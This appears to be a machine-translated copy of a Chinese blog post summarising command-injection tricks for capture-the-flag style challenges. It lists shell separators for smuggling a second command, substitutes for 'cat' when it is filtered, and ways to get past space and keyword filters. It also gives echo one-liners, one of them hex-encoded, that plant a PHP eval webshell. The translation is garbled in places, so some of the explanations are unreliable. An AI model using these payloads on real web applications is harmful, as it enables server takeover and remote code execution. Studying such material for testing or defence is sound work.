RCE simple injection attacks

Enterprise 2020-03-13 10:48:38 views: null

@ Simple RCE summary

First: Command Injection is a web application to submit data user detection command is not strictly caused by the attack. Like the sql injection attacks will cause great harm. - to a summary of road safety white

Some bypassing summary

  1. Command connector

    1. ";": Complete the implementation of the previous statement and then execute the statements that follow.
    2. "|": Displays the result later statement.
    3. "||": statement currently face execution error, execute the statements that follow.
    4. "&": Two commands are executed, if the previous statement is false behind the implementation of the statement is executed, the previous statement can be arguably false.
    5. "&&": If the previous statement is false error directly, not behind the implementation of the statement, the previous statement is true then the two commands are executed, the previous statement can only be true.
    6. % 0a "url-encoded as the line break, can not be directly used in the linux need php environment" (after filtering out several conceivable front);

  2. Command to view the contents of the file

    1. "Cat" began to show from the first row, and all content output.
    2. "Tac" In contrast with the cat, progressive output start from the last row.
    3. "More" is our common pipeline pagination.
    4. "Head" can display the first few lines of text content
    5. "Tail" is displayed at the end of lines
    6. "Nl" and cat -n command, the output displays the line number and contents;

  3. Command line by writing webshell

    1. “linux":echo “<?php eval(@\$_POST['pass']);?>” > webshell.php;
    2. echo 3c3f7068706576616c2840245f504f53545b2270617373225d293b3f3e | xxd -r -ps> webshell.php // association with one similar to, and knowledge turned into hexadecimal | xxd is the hexadecimal turn back
    3. windos下:“echo ^<?php eval($_POST[pass]); ?^> > webshell.php”

  4. NA spaces posture

    1. “{ls,-a}"
    2. “<”:ls<-a
    3. I F S : borrow Many Rich the Lord of solution IFS: blogger explained by the public: IFS representing the separator under linux, but if a simple cat I F S 2 , b a s h I F S 2 IFS2, the bash interpreter will entire variable name as IFS2, resulting in lost out the results, however, if {} is fixed plus a variable name, add back the same way can play the role of a truncated, but why should it $ 9, $ 9 because only the holder of the ninth parameters of the current system shell process, it is always empty string.
    4. Environment variables: the shell = Katex the parse error: Undefined Control Sequence: \ X position 2 AT: '\ x20123'; \ is a space on the x20. ... (the Find Flag *).
5.**当过滤大部分操时候** 
		1. 可以使用$@,例如:ca$@t flag
N0_ne1d_
Published an original article · won praise 2 · views 20
Private letter concerns

Guess you like

Origin blog.csdn.net/weixin_44611282/article/details/104828283
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com